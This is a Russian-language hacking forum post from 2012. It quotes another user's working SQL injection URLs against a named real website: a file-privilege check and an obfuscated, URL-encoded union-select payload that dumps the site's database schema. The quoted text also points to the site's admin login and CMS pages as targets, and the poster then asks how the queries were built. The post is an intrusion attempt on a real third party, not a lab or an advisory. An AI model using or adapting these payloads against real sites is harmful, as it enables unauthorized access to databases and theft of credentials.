09.03.2012, 20:45
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Сообщение от Ereee
1)
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,file_priv+FROM+mysql.user+where+user=user()
Ошибка, значит нет прав.
2) Все таблицы:
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Как видишь ни намека на пароли. Видимо пароли в файлах или в др. учетках.
Вот цель например:
Код:
http://www.robolive.ru/cms/
http://www.robolive.ru/gb/admin/index.php?in_action=logon
Ничего не понятно блин!
Как запросы такие составлены?
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Как были найдены ссылки
Код:
http://www.robolive.ru/cms/ http://www.robolive.ru/gb/admin/index.php?in_action=logon
?
|
|
|